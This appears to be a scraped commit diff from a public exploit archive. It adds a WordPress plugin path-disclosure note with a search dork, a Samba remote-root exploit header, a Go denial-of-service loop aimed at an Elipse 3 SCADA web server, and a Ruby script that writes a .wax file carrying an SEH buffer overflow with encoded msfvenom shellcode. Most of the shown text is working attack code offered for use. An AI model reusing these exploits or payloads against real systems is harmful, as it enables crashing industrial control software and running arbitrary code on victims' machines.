|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|
||||
|~Vulnerability Style : FULL PATH DISCLOSURE
|
||||
|[~]Date : "26.11.2014"
|
||||
|[~]Tested on : Kali Linux, Windows 7
|
||||
|DORK: inurl:html5plus/html5full.php
|
||||
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
==============[Exploitation]===============================
|
||||
|
||||
http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
|
|
@ -1,3 +1,4 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/7106/info
|
||||
|
||||
Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.
|
||||
|
@ -5,6 +6,7 @@ Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries
|
|||
An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values.
|
||||
|
||||
Note that the smbd service runs with root privileges.
|
||||
*/
|
||||
|
||||
/**
|
||||
** sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root
|
||||
|
|
69
platforms/windows/dos/35379.go
Executable file
69
platforms/windows/dos/35379.go
Executable file
|
@ -0,0 +1,69 @@
|
|||
// Exploit Http DoS Request for SCADA ATTACK Elipse 3
|
||||
// Mauro Risonho de Paula Assumpção aka firebits
|
||||
// mauro.risonho@gmail.com
|
||||
// 29-10-2013 11:42
|
||||
// Vendor Homepage: http://www.elipse.com.br/port/index.aspx
|
||||
// Software Link: http://www.elipse.com.br/port/e3.aspx
|
||||
// Version: 3.x and prior
|
||||
// Tested on: windows
|
||||
// CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8652
|
||||
// NVD : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8652
|
||||
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
|
||||
// exploit in Golang (golang.com) C Google
|
||||
// compile and execute:
|
||||
// go build Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
|
||||
// chmod +x Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
|
||||
// ./Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
|
||||
|
||||
package main
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"net/http"
|
||||
)
|
||||
|
||||
func main() {
|
||||
count := 1
|
||||
// fmt.Println ("")
|
||||
// fmt.Println (" _____.__ ___. .__ __ ")
|
||||
// fmt.Println (" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
|
||||
// fmt.Println (" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
|
||||
// fmt.Println (" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
|
||||
// fmt.Println (" |__| |__||__| \___ >___ /__||__| /____ > ")
|
||||
// fmt.Println (" \/ \/ \/ ")
|
||||
// fmt.Println (" bits on fire. ")
|
||||
fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
|
||||
fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
|
||||
fmt.Println ("29-10-2013 11:42")
|
||||
fmt.Println ("mauro.risonho@gmail.com")
|
||||
fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
|
||||
fmt.Println ("20 requests connections per second")
|
||||
|
||||
for {
|
||||
count += count
|
||||
//http://192.168.0.1:1681/index.html -> Elipse 3 http://<ip-elipse4><port listen: default 1681>
|
||||
|
||||
fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
|
||||
fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
|
||||
fmt.Println ("29-10-2013 11:42")
|
||||
fmt.Println ("mauro.risonho@gmail.com")
|
||||
fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
|
||||
fmt.Println ("20 requests connections")
|
||||
|
||||
fmt.Println ("Connected Port 1681...Testing")
|
||||
fmt.Println ("Counter Loops: ", count)
|
||||
|
||||
res, err := http.Get("http://192.168.0.1:1681/index.html")
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
robots, err := ioutil.ReadAll(res.Body)
|
||||
res.Body.Close()
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
fmt.Printf("%s", robots)
|
||||
}
|
||||
}
|
45
platforms/windows/local/35377.rb
Executable file
45
platforms/windows/local/35377.rb
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/env ruby
|
||||
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
|
||||
# Date: 26.11.2014
|
||||
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
|
||||
# Vendor Homepage: not valid anymore
|
||||
# Software Link: not available
|
||||
# Version: 3.1.2.1.2010.03.30
|
||||
# Discovery: ZoRLu / zorlu@milw00rm.com
|
||||
# Tested on: Microsoft Windows XP [Version 5.1.2600]
|
||||
|
||||
filename = "3-1-2-1-gb.wax"
|
||||
|
||||
seh = 43501
|
||||
buff = "\x41" * 45000
|
||||
nops = "\x90" * 16
|
||||
|
||||
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
|
||||
sc =
|
||||
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
|
||||
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
|
||||
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
|
||||
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
|
||||
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
|
||||
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
|
||||
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
|
||||
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
|
||||
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
|
||||
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
|
||||
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
|
||||
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
|
||||
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
|
||||
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
|
||||
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
|
||||
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"
|
||||
|
||||
buff[seh-4,4] = "\xeb\x0e\x90\x90"
|
||||
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")
|
||||
buff[seh+4,nops.size] = nops
|
||||
buff[seh+(4+nops.size),sc.size] = sc
|
||||
|
||||
File.open(filename,"wb") do |fp|
|
||||
fp.write(buff)
|
||||
fp.close
|
||||
puts "Exploit file created: #{filename} size: #{buff.size}"
|
||||
end
|
Loading…
Add table
Reference in a new issue